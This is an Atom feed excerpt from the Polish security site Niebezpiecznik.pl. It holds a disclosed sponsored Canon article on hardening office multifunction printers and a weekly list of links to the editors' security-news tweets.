<?xml version="1.0" encoding="UTF-8" standalone="no"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:thr="http://purl.org/syndication/thread/1.0" xml:lang="en-US">
	<title type="text">Niebezpiecznik.pl</title>
	<subtitle type="text">Piszemy o bezpieczeństwie i nie. Szkolimy programistów i administratorów oraz zwykłe Panie Halinki. No i znamy Twój PIN!</subtitle>

	<updated>2026-04-27T13:53:34Z</updated>

	<link href="https://niebezpiecznik.pl" rel="alternate" type="text/html"/>
	<id>https://niebezpiecznik.pl/feed/atom/</id>
	<link href="https://niebezpiecznik.pl/feed/atom/" rel="self" type="application/atom+xml"/>

	<generator uri="https://wordpress.org/" version="6.9.4">WordPress</generator>
	<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Dlaczego drukarki w stanie fabrycznym to stan zagrożenia, a nie gotowości]]></title>
		<link href="https://niebezpiecznik.pl/post/dlaczego-drukarki-w-stanie-fabrycznym-to-stan-zagrozenia-a-nie-gotowosci/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=27035</id>
		<updated>2026-04-27T13:53:34Z</updated>
		<published>2026-04-27T11:55:07Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="ARTYKUŁ SPONSOROWANY"/><category scheme="https://niebezpiecznik.pl" term="Canon"/><category scheme="https://niebezpiecznik.pl" term="drukarki"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/dlaczego-drukarki-w-stanie-fabrycznym-to-stan-zagrozenia-a-nie-gotowosci/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/Niebezpiecznik_480x480_4-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/Niebezpiecznik_480x480_4-150x150.jpg 150w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/Niebezpiecznik_480x480_4-250x250.jpg 250w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/Niebezpiecznik_480x480_4.jpg 480w" sizes="(max-width: 100px) 100vw, 100px" /></a>Załóżmy, że masz poukładane serwery, endpointy, segmentację, EDR, SOC nie płacze. Czujesz spokój. Ogród zen. I wtedy przypominasz sobie o drukarkach. W rogu stoi MFP (ang. Multifunction Printer, drukarka wielofunkcyjna) . Niby mebel. A tak naprawdę: komputer z dyskiem, usługami sieciowymi, historią zadań, skanami, adresami e-mail i panelkiem, na którym ludzie klikają wszystko, co mruga. [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/dlaczego-drukarki-w-stanie-fabrycznym-to-stan-zagrozenia-a-nie-gotowosci/"><![CDATA[<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/Niebezpiecznik-800x350-1.jpg"><img fetchpriority="high" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/Niebezpiecznik-800x350-1-600x263.jpg" alt="" width="600" height="263" class="aligncenter size-large wp-image-27048" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/Niebezpiecznik-800x350-1-600x263.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/Niebezpiecznik-800x350-1-350x153.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/Niebezpiecznik-800x350-1-768x336.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/Niebezpiecznik-800x350-1.jpg 800w" sizes="(max-width: 600px) 100vw, 600px" /></a></p>
<p>Załóżmy, że masz poukładane serwery, endpointy, segmentację, EDR, SOC nie płacze. Czujesz spokój. Ogród zen. I wtedy przypominasz sobie o drukarkach. W rogu stoi MFP (ang. Multifunction Printer, drukarka wielofunkcyjna) . Niby mebel. A tak naprawdę: komputer z dyskiem, usługami sieciowymi, historią zadań, skanami, adresami e-mail i panelkiem, na którym ludzie klikają wszystko, co mruga. Jeśli zostawisz je w konfiguracji fabrycznej, to nie masz „drukarki”. Masz hosta z dość ciekawą powierzchnią ataku. I cyberninja o tym wie&#8230;<span id="more-27035"></span></p>
<div class="info">Ten tekst otwiera cykl o bezpieczeństwie urządzeń drukujących w środowisku firmowym. W kolejnych rozdziałach będziemy przechodzić przez etapy „<a href="https://niebezpiecznik.pl/samuraj" target="_blank">Drogi Samuraja</a>”: od stanu fabrycznego, przez hardening i monitoring, aż po druk w duchu Zero Trust i budowę spójnego ekosystemu obrony. Dlatego, jeśli chcesz podążać tą ścieżką razem z nami &#8211; śledź kolejne odsłony. Każda część cyklu będzie kolejnym krokiem na tatami, kolejnym elementem sztuki ochrony danych, której Samuraj nie odkłada na później.</div>
<p>&nbsp;<br />
SPIS TREŚCI</p>
<ul class="nomargin">
<li><a href="#rozgrzewka">Rozgrzewka na macie – ustawienia fabryczne jako punkt startowy</a></li>
<li><a href="#bezbronnosc">Nie jesteś bezbronny &#8211; utwardzanie urządzeń</a></li>
<li><a href="#hardening">Hardening drukarek – jak się do tego zabrać?</a></li>
<li><a href="#flota">Masz flotę? Potrzebujesz zarządzania</a></li>
</ul>
<p>Nie masz czasu na lekturę całości artykułu? Zacznij od filmu! Zobacz, jak patrzymy na to zagadnienie, a po konkrety i przykłady &#8212; kontynuuj lekturę artykułu.</p>
<p><iframe width="560" height="315" src="https://www.youtube.com/embed/vL1NCmNj2Nc?si=zHx65UjMlM9rrvxA" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p><a name="rozgrzewka"></a></p>
<h3>Rozgrzewka na macie</h3>
<p>Nowoczesne urządzenia wielofunkcyjne są projektowane tak, żebyś mógł je postawić i po 10 minutach usłyszeć: „drukuje!”. Dla użytkownika to ideał: zero pytań, zero błądzenia po ustawieniach, minimalny udział IT.</p>
<p>Takie urządzenie wydrukuje wszystko bez pytania o tożsamość użytkownika. Skanowanie i kopiowanie działają równie swobodnie: jeden szybki ruch, jeden „scan to email”, i dokument z pieczątką wylatuje poza firmę bez śladu w logach. A gdy urządzenie wystawia równocześnie panel webowy, SMB, FTP, WebDAV, SNMP czy IPP, otwiera w murach sieci tyle bram i furtek, ile dróg i ścieżek prowadzi do oblężonego zamku &#8211; i zazwyczaj nikt ich nie patroluje.</p>
<p class="p1">Do tego dochodzą nieszyfrowane transmisje i domyślne hasła administratora, które nadal są jednym z najczęstszych wektorów ataku.</p>
<p>Jednak <b><strong>z perspektywy bezpieczeństwa ustawienia fabryczne należałoby traktować wyłącznie jako tryb startowy</strong></b>.<span class="Apple-converted-space">  </span>Urządzenie bez utwardzonej konfiguracji jest jak wojownik bez zbroi &#8211; pierwszy cios cyberninja może go powalić.</p>
<p><a name="bezbronnosc"></a></p>
<h3>Dobra wiadomość: nie jesteś bezbronny.</h3>
<p class="p1">Zbroją, która będzie Cię chronić jest <b><strong>hardening urządzenia, </strong></b>czyli takie skonfigurowanie jego ustawień, żeby było trudniejsze do zaatakowania, przejęcia albo wykorzystania jako „furtka” do firmowej sieci.</p>
<p>Wystarczy, że robisz to raz, porządnie, a potem utrzymasz jako standard &#8211; w duchu <b><strong>NIST SP 800</strong></b> (800-53/171/88/40) &#8211; czyli zestawu wytycznych amerykańskiego National Institute of Standards and Technology dotyczących bezpieczeństwa systemów IT &#8211; i z kryptografią, której nie da się zbyć tekstem „to tylko drukarka” (<b>FIPS 140-3</b>).</p>
<p class="p1">&#8211; Utwardzanie MFP to nie jest ‘włączenie jednego checkboxa’. To dopasowanie urządzenia do polityk bezpieczeństwa organizacji &#8211; tak, żeby drukarka była tak samo przewidywalna i kontrolowana jak serwer czy laptop – komentuje <b><strong>Darek Szwed</strong></b>, <b>ekspert Canon Polska w obszarze bezpieczeństwa danych</b>.</p>
<p><a name="hardening"></a></p>
<h3>Hardening drukarek: Jak się do tego zabrać?</h3>
<blockquote><p><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f536.png" alt="🔶" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Po pierwsze: Rozpoznaj taktykę przeciwnika. Drukarka też ma swoje słabe punkty, które mogą stać się celem ataku.</p></blockquote>
<p class="p1">Zanim zaczniesz cokolwiek „zabezpieczać”, zrób ten prosty test mentalny: <b><strong>Czy pozwoliłbyś, żeby w twojej sieci stał komputer z dyskiem i kilkoma usługami, którego nikt nie patchuje, nikt nie loguje, a panel admina jest dostępny z VLAN-u użytkowników?</strong></b></p>
<p class="p1">Jeśli odpowiedź brzmi „nie”, to gratulacje. Przy okazji… właśnie opisałeś typową drukarkę w trybie fabrycznym.</p>
<p class="p1">Załóżmy, że firma dokonała dobrego wyboru – urządzenia drukujące spełniają normy bezpieczeństwa, mają certyfikowane moduły, wspierają szyfrowanie, audyt, kontrolę dostępu. To jednak tylko pozorne bezpieczeństwo.</p>
<p class="p1">Bo urządzenie „prosto z pudełka”: otwiera zbyt wiele portów, udostępnia zbędne protokoły, nie wymusza haseł, pozwala drukować wszystko każdemu, nie szyfruje transmisji, nie zapisuje logów, nie integruje się z żadną polityką firmy…</p>
<p class="p2">To jak posiadać najlepszy miecz… i walczyć gołymi rękami.</p>
<p class="p2">To nie jest teoria. To jest codzienność w biurach. Domyślna konfiguracja MFP jest <b><strong>wygodna</strong></b> dla użytkownika, ale <b><strong>zdradliwa</strong></b> dla bezpieczeństwa i <b><strong>śmiertelna</strong></b> dla infrastruktury.</p>
<blockquote><p><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f536.png" alt="🔶" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Po drugie: Nie klikaj na czuja. Użyj Security Settings Navigator</p></blockquote>
<p class="p1">Jeśli teraz myślisz: „OK, to wejdę w ustawienia i wyłączę wszystko” &#8211; stop.<br />
Samuraj nie macha mieczem na oślep.</p>
<p class="p1">W japońskim uniwersum <span class="s2"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f609.png" alt="😉" class="wp-smiley" style="height: 1em; max-height: 1em;" /></span> możesz sięgnąć po narzędzie typu <b><a href="https://www.canon.pl/business/solutions/security-navigator/" target="_blank">Security Settings Navigator</a></b>, które prowadzi cię przez hardening jak mistrz podczas treningu w dojo:</p>
<ul class="ul1">
<li class="li4">zadaje kilka pytań o środowisko (dosłownie kilka, bez doktoratu),</li>
<li class="li4">podpowiada zmiany zgodne z dobrymi praktykami NIST: minimalizacja uprawnień, ograniczenie usług, segmentacja, szyfrowanie,</li>
<li class="li4">na końcu daje ci konkretną listę ustawień do wdrożenia.</li>
</ul>
<p class="p1">&#8211; W praktyce drukarki rzadko mają<span class="Apple-converted-space">  </span>przypisanego jednego „właściciela”, a w efekcie są trochę niczyje. Admin sieci widzi je jako kolejny adres IP do ogarnięcia, security skupia się na serwerach i firewallach, a sama drukarka ląduje gdzieś pomiędzy &#8211; podłączona do sieci, z własnym systemem i usługami, których nikt na co dzień nie pilnuje.</p>
<p><b><strong>Security Settings Navigator</strong></b> pomaga domknąć ten temat bez zgadywania. Zamiast klikania „na wyczucie” prowadzi krok po kroku i zamienia ogólne zasady bezpieczeństwa w konkretne, sensowne ustawienia urządzenia. Bez wróżenia z fusów i przypadkowego klikania wszystkiego, co da się wyłączyć – mówi <b><strong>Daniel Mazur,</strong></b> dyrektor działu technicznego w Inforoffice Polska.</p>
<blockquote><p><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f536.png" alt="🔶" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Po trzecie: Spójrz zagrożeniom w oczy.</p></blockquote>
<p class="p1">Chcesz prostą zasadę NIST-ową, która robi największą różnicę? <b><strong>Powiąż operacje z tożsamością.</strong></b></p>
<p class="p1">Jeśli dziś u ciebie jest tak:</p>
<ul class="ul1">
<li class="li4">każdy może podejść i wydrukować/zeskanować,</li>
<li class="li4">„PIN jest wspólny”,</li>
<li class="li4">logi są „jakieś” albo żadne,</li>
</ul>
<p class="p1">to masz idealne warunki, żeby w razie incydentu ktoś powiedział: <i>„to nie ja”</i> &#8211; i na tym kończy się badanie ścieżek wroga.</p>
<p class="p1">Zrób więc to, co robisz w innych systemach:</p>
<ul class="ul1">
<li class="li4">włącz uwierzytelnianie (karta/PIN/SSO),</li>
<li class="li4">rozdziel role (użytkownik vs admin vs użytkownik vs serwis),</li>
<li class="li4">ogranicz funkcje zależnie od roli,</li>
<li class="li4">loguj i audytuj.</li>
</ul>
<p class="p4">&#8211; Największa różnica ‘po hardeningu’ to moment, w którym operacje na MFP przestają być anonimowe. Jeśli drukujesz, kopiujesz, skanujesz &#8211; to jest to przypięte do tożsamości – dodaje Daniel Mazur, Inforoffice Polska.</p>
<blockquote><p><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f536.png" alt="🔶" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Po czwarte: Zamknij zbędne bramy. Mniej protokołów = mniej problemów</p></blockquote>
<p class="p1">Teraz robisz ulubioną część adminów: <b><strong>redukcję powierzchni ataku</strong></b>. Wyobraź sobie MFP jako zamek. Jeśli masz 12 bram, to cyberninja nie musi być geniuszem &#8211; wystarczy, że jedna jest uchylona.</p>
<p class="p1">Twoje zadanie:</p>
<ul class="ul1">
<li class="li4">wyłącz protokoły, których nie używasz (serio, <i>nie używasz</i>),</li>
<li class="li4">zostaw tylko te, które są potrzebne do realnych procesów,</li>
<li class="li5">zabezpiecz panel administratora: tylko HTTPS i dostęp wyłącznie z określonych adresów/VLANów.</li>
<li class="li5">kontroluj pozostałą komunikację: skonfiguruj ACL/filtry IP i segmentację.</li>
</ul>
<p>To jest dokładnie ta część, w której drukarka przestaje być „łatwym celem”.</p>
<blockquote><p><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f536.png" alt="🔶" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Po piąte: “Szyfruj albo giń” + FIPS 140-3</p></blockquote>
<p class="p1">Tu wchodzimy na poziom, gdzie nie da się już powiedzieć: „to tylko drukarka”. MFP przetwarza dane. Czasem bardzo wrażliwe.</p>
<p>To oznacza, że:</p>
<ul class="ul1">
<li class="li2"><b>dane w spoczynku</b> (na dysku),</li>
<li class="li2"><b>dane w tranzycie</b> (po sieci),</li>
<li class="li4"><b>tożsamość i rozliczalność</b> (kto, co, kiedy zrobił)</li>
</ul>
<p class="p4">…muszą być chronione jak w każdej innej części IT.</p>
<p class="p1">FIPS 140-3 jest standardem certyfikacji modułów kryptograficznych. Nie chodzi o to, żebyś teraz recytował listę algorytmów. Chodzi o to, żeby kryptografia w urządzeniu była <b><strong>sprawdzalna, aktualna i sensownie wdrożona</strong></b>.</p>
<p class="p1">W praktyce:</p>
<ul class="ul1">
<li class="li2">szyfrujesz dane na dysku (żeby kradzież urządzenia nie była kradzieżą danych),</li>
<li class="li2">wymuszasz TLS/HTTPS (żeby wydruki i skany nie latały “plaintextem”),</li>
<li class="li2">spinasz urządzenie z katalogiem/SSO (żeby operacje były przypisane do użytkownika).</li>
</ul>
<p class="p1"><b><br />
</b>&#8211; <em>Kryptografia i tożsamość to dwa filary. Jeśli drukujesz bez autoryzacji i bez szyfrowania, to nawet najlepszy firewall nie uratuje cię przed własną infrastrukturą </em>– dodaje Dariusz Szwed, Canon Polska.</p>
<blockquote><p><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f536.png" alt="🔶" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Po szóste:<b>Posprzątaj po sobie. Bufory i historie to też dane</b></p></blockquote>
<p class="p1">NIST 800-88 mówi o sanitizacji danych. Brzmi prawie tak samo jakbym mówił do Ciebie po japońsku?</p>
<p>W odniesieniu do MFP oznacza to: <b><strong>nie zostawiaj śladów, które ktoś może później wykorzystać przeciw Tobie</strong></b>.</p>
<p class="p1">Sprawdź/włącz:</p>
<ul class="ul1">
<li class="li4">automatyczne czyszczenie danych zadań i buforów,</li>
<li class="li4">nadpisywanie danych tam, gdzie jest wspierane,</li>
<li class="li4">sensowną retencję logów (żeby pomagały, a nie szkodziły).</li>
</ul>
<p class="p5">To jeden z tych rytuałów, których znaczenia często się nie docenia, dopóki nie nadejdzie czas próby, a audyt lub incydent nie odsłoni prawdy…</p>
<blockquote><p><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f536.png" alt="🔶" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Po siódme: Pokaż mi porty, a powiem ci, czy Twoja twierdza przetrwa oblężenie</p></blockquote>
<p class="p4">Przed hardeningiem często zobaczysz:</p>
<ul class="ul1">
<li class="li4">dużo otwartych portów,</li>
<li class="li4">kilka aktywnych usług „bo tak”,</li>
<li class="li4">admina dostępnego z sieci użytkowników,</li>
<li class="li4">brak twardego wymuszenia szyfrowania.</li>
</ul>
<p class="p1">Po wdrożeniu polityk w duchu NIST i FIPS:</p>
<ul class="ul1">
<li class="li4">portów robi się wyraźnie mniej (czasem drastycznie),</li>
<li class="li4">zostają tylko potrzebne usługi,</li>
<li class="li4">admin jest w kontrolowanej strefie,</li>
<li class="li4">komunikacja jest szyfrowana,</li>
<li class="li4">stare protokoły znikają.</li>
</ul>
<p class="p1">To nie jest kosmetyka. To jest realna zmiana profilu obrony: ograniczona powierzchnia ataku, większa szansa na przetrwanie, gdy nocą do bram podejdzie wróg.</p>
<p><a name="flota"></a></p>
<h3>Security Settings Navigator oczywiście nie jest lekarstwem na wszystko.<br />
Masz flotę? Potrzebujesz zarządzania.</h3>
<p class="p1">Jeśli masz jedną drukarkę, możesz przemierzać drogę bezpieczeństwa jako <b><strong>wojownik samotnik</strong></b>, który zna każdy port, każdą usługę, każdy ruch maszyny. Jeśli masz ich 80… to już nie jest nawet dojo, tylko pełnowymiarowe pole bitwy, włączające konieczność strategicznego planowania.</p>
<p class="p1">Security Settings Navigator ma sens szczególnie dla małych środowisk lub pojedynczych urządzeń.</p>
<p>Przy dużej skali nie chodzi już tylko o ochronę. Chodzi o dyscyplinę &#8211; o to, by każde urządzenie, w każdej lokalizacji, działało zgodnie z jedną ścieżką, jednym kodeksem.</p>
<p class="p1">Do tego potrzeba już narzędzi zdolnych do:</p>
<ul class="ul1">
<li class="li1">masowych zmian konfiguracji,</li>
<li class="li1">weryfikacji zgodności,</li>
<li class="li1">aktualizacji,</li>
<li class="li1">raportów pod audyt</li>
</ul>
<p class="p6">I ten wątek otwiera kolejną sagę o Samuraju, który strzeże firmowych danych.</p>
<p class="p1"><b><strong>Hardening jest rytuałem wejścia, a utrzymanie zgodności &#8211; dowodem, że wojownik pozostaje wierny swojemu przeznaczeniu.</strong></b></p>
<div class="info">
Autorem niniejszego artykułu jest <strong>Canon Polska</strong>, producent i dostawca rozwiązań do druku i obiegu dokumentów, w których bezpieczeństwo jest <a href="https://www.canon.pl/press-centre/press-releases/2026/04/canon-recognised-as-a-leader-in-the-worldwide-print-security-solutions-and-services-hardcopy/" target="_blank">elementem architektury</a>, a nie dodatkiem. Artykuł jest artykułem sponsorowanym i za jego publikację otrzymaliśmy wynagrodzenie. </p>
<p>Rozwiązania do druku od <strong>Canon Polska</strong> stawiają na bezpieczeństwo, co widać zarówno w zaawansowanych urządzeniach wielofunkcyjnych z <a href="https://www.canon.pl/business/products/office-printers/multifunction/imageforce/" target="_blank">serii imageFORCE</a>, tworzonych z myślą o środowiskach o podwyższonych wymaganiach bezpieczeństwa, jak i laserowych drukarkach Canon <a href="https://www.canon.pl/printers/laser-printers/" target="_blank">iSENSYS</a>, które już w podstawowej konfiguracji oferują szyfrowanie danych, silne mechanizmy uwierzytelniania i nowoczesne standardy sieciowe.</p>
<p>Partnerem merytorycznym artykułu jest także <a href="https://inforoffice.pl/bezpieczenstwo-druku/" target="_blank">Inforoffice Polska</a><br />
Akredytowany Partner Canon Polska. Integrator rozwiązań z zakresu druku, kopiowania, skanowania i cyfrowego obiegu dokumentów. Specjalizuje się we wdrażaniu bezpiecznych środowisk pracy z dokumentami, łącząc urządzenia Canon z systemami zarządzania dokumentami, kontroli dostępu i politykami bezpieczeństwa organizacji.
</div>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/dlaczego-drukarki-w-stanie-fabrycznym-to-stan-zagrozenia-a-nie-gotowosci/#comments" rel="replies" thr:count="1" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/dlaczego-drukarki-w-stanie-fabrycznym-to-stan-zagrozenia-a-nie-gotowosci/feed/atom/" rel="replies" thr:count="1" type="application/atom+xml"/>
			<thr:total>1</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[O czym pisaliśmy w zeszłym tygodniu, ale &#x274c; NIE na Niebezpieczniku?]]></title>
		<link href="https://niebezpiecznik.pl/post/o-czym-pisalismy-w-zeszlym-tygodniu-ale-nie-na-niebezpieczniku/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=27044</id>
		<updated>2026-04-27T10:17:50Z</updated>
		<published>2026-04-27T10:15:21Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="Niebezpiecznik"/><category scheme="https://niebezpiecznik.pl" term="Twitter"/><category scheme="https://niebezpiecznik.pl" term="X"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/o-czym-pisalismy-w-zeszlym-tygodniu-ale-nie-na-niebezpieczniku/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/niebezpiecznik-logo-black-150x150.png" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>W jednym z ostatnich artykułów przypomnieliśmy, że nasza redakcja jest najbardziej aktywna na Twitterze. Część z Was zwróciła uwagę, że na Twittera nie zagląda i zasugerowała, aby publikować tu, na Niebezpieczniku, jakiś &#8220;skrót&#8221; tego o czym twitujemy. No więc oto pierwszy z takich skrótów, podsumowujący zeszły tydzień naszej aktywności na Twitterze (~40 wpisów, ~5 dziennie). Zanim [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/o-czym-pisalismy-w-zeszlym-tygodniu-ale-nie-na-niebezpieczniku/"><![CDATA[<p>W jednym z ostatnich artykułów przypomnieliśmy, że nasza redakcja jest najbardziej aktywna na Twitterze. Część z Was zwróciła uwagę, że na Twittera nie zagląda i zasugerowała, aby publikować tu, na Niebezpieczniku, jakiś &#8220;skrót&#8221; tego o czym twitujemy. No więc oto pierwszy z takich skrótów, podsumowujący zeszły tydzień naszej aktywności na Twitterze (~40 wpisów, ~5 dziennie). </p>
<p>Zanim jednak do niego przejdziemy &#8212; słowo wyjaśnienia, dlaczego na Twitterze pojawiają się treści, których nie widać na Niebezpiecznik.pl. <span id="more-27044"></span></p>
<h3>Dlaczego Twitter?</h3>
<p>Od zawsze staramy się, aby na Niebezpiecznika trafiały dłuższe, przemyślane i mocno merytoryczne publikacje. Bo Niebezpiecznik to serwis internetowy, a nie platforma społecznościowa. Nie każdy wpis z Twittera da się rozwinąć do tego typu formy &#8212; a <strong>na siłę nie ma sensu tego robić</strong>. Coś co może być jednym zdaniem, lepiej żeby pozostało jednym zdaniem, a nie przepełnionym miałką treścią artykułem na 15 akapitów. To pierwszy, najważniejszy powód. Drugim powodem jest to, że na Twitterze często podajemy lub &#8220;retwitujemy&#8221; dalej cudze treści bez jakiegokolwiek opisu. To zdecydowanie szybsze i mniej pracochłonne niż pełnoprawna publikacja na Niebezpieczniku.  </p>
<p>I żeby było jasne &#8212; <strong>Twitter nie jest idealną platformą</strong> (wręcz jest bardzo nieidealną), ale ze uważamy, że jeśli chodzi o obszar IT Security, to ze wszystkich social mediów jest platformą najlepszą, jeśli chodzi o ilość i jakość wiedzy oraz <strong>prędkość</strong> jej pozyskiwania (jeśli się wie, kogo śledzić). Dlatego tych z Was, którzy zajmują się cyberbezpieczeństwem zawodowo, zachęcamy do <a href="https://x.com/niebezpiecznik">obserwowania naszego profilu</a> &#8212; abyście trzymali rękę na pulsie, bo to w naszej branży jest szalenie istotne. Np. opisywany przez nas tydzień temu na Twitterze <a href="https://x.com/niebezpiecznik/status/2046490369584402936" target="_blank">hack Polymarketu suszarką</a> niektóre serwisy opisuję dopiero dziś, po tygodniu&#8230; </p>
<p>Reszcie naszych Czytelników, mamy nadzieję, że wystarczą takie podsumowania jak to.</p>
<ol>
<li><a href="https://x.com/niebezpiecznik/status/2045941650048929886?s=20">Film pokazujący narzędzie &#8220;Maven&#8221; od Palantira w akcji</a>.</li>
<li><a href="https://x.com/niebezpiecznik/status/2046161621970546968">Ostrzeżenie o awarii Polcardu</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2046285079228362756">Ciekawy wątek o antenach szpiegowskich na dachu rosyjskiej ambasady w Wiedniu</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2046303797321093470">Wątek o &#8220;wycieku danych&#8221; z seriwsu do vibecodingu: Lovable</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2046463456807669905">Video laptopa z 1989 &#8212; uwaga, uronicie łzę</a>.</li>
<li><a href="https://x.com/niebezpiecznik/status/2046490369584402936">Historia o tym jak ktoś wygrał kupę kasy w zakładzie na Polymarket &#8230;suszarką, którą sztucznie podbił temperature w okolicach czujnika na lotnisku.</a> </li>
<li><a href="https://x.com/niebezpiecznik/status/2046589465477394527" target="_blank">O chaosie w Zondzie</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2046602622157590715" target="_blank">O tym że wszędzie większość treści to już prawie treści generowane przez AI</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2046646650014175608" target="_blank">O tym jak kopanie prądem porfeli bitocoinowych pomaga wykraść z nich środki</a>.</li>
<li><a href="https://x.com/niebezpiecznik/status/2046662100064375125" target="_blank">Porady co do bezpiecznego sposobu na kasowanie kont z serwisów internetowych.</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2046826117726618106" target="_blank">O tym jak typy z Discorda uzyskały dostęp do Mythosa od Anthropica na lewo</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047013570357944573">Komunikat dla użytkowników Jiry i Confluence o tym, że mają czas do 27 sierpnia aby wypisać się z użycia ich danych do szkolenia modeli AI</a>.</li>
<li><a href="https://x.com/niebezpiecznik/status/2047195743434277069" target="_blank">Opis ciekawego sposobu na wyciek danych z iPhona i poprawki bezpieczeństwa do iOS</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047195767308222708" target="_blank">Demo narzędzia do spoofingu GPS</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047217628419162250" target="_blank">O ataku na niemieckich polityków przez Signala.</a></li>
<li>A tego posta to zacytujemy w całości bo śmieszny:<br />
<blockquote class="twitter-tweet">
<p lang="pl" dir="ltr">Kamil napisał: &quot;W naszej firmie właśnie ruszyła <img src="https://s.w.org/images/core/emoji/17.0.2/72x72/274c.png" alt="❌" class="wp-smiley" style="height: 1em; max-height: 1em;" /> fala zwolnień ze względu na AI. Okazało się, że kosz tokenów modeli AI zrobił się tak duży, że anulowaliśmy 5 subskrypcji narzędzi AI i zatrudniliśmy 2 senior programistów&quot;</p>
<p>&mdash; Niebezpiecznik (@niebezpiecznik) <a href="https://twitter.com/niebezpiecznik/status/2047230252091322588?ref_src=twsrc%5Etfw">April 23, 2026</a></p></blockquote>
<p> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></li>
<li><a href="https://x.com/niebezpiecznik/status/2047245653860860401" target="_blank">O ataku na skaner kodu Checkmarx i ryzykach z tym związanych dla jego użytkowników</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047253747810586786" target="_blank">Apel aby uważać na wyszukiwarkę tanich lotów Kiwi</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047224526971306275" target="_blank">Komentarz do smutnej historii przedsiębiorcy, który chciałby korzystać z systemów rządowych na 16 letnim komputerze.</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047316097255268621" target="_blank">Opis zhackowania Bitwardena CLI</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047378473912586642" target="_blank">O tym że Chińczycy destylują Amerykanów</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047566693132624016" target="_blank">O taśmach Suszek &#8211; Zaorski i długach liczonych w milionach</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047574190824276364" target="_blank">Test autotłumaczenia</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047589150094762141" target="_blank">O kolejnej osobie, która ograła Polymarket: żołnierzu USA co zarobił 1,5 miliona złotych.</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047594393322840328" target="_blank">Memik na temat wykorzystania tokenów AI w firmach</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047654548060147863" target="_blank">O upadających programach Bug Bounty</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047931615058305101" target="_blank">O chińskim detektorze StarLinków</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047960575779516636" target="_blank">Komentarz do fakenewsa na temat sprzedaży danych klientów Zondy</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2048008936800887105" target="_blank">Informacja o inwestycji Google w Anthropic: 40 miliardów dolarów</a>.</li>
<li><a href="https://x.com/niebezpiecznik/status/2048027295026127111" target="_blank">O nowych ustawieniach treści w Twitterze</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2048102767802159368" target="_blank">O hacku Ukraińców spotkania rekrutacyjnego, na którym zachęcano studentów do wstąpienia do armii</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2048104255865639309" target="_blank">O dużej akcji rozmontowania azjatyckiego scam center które robiło wały &#8220;na romanse&#8221;, &#8220;na pracownika banku&#8221; it</a>p.</li>
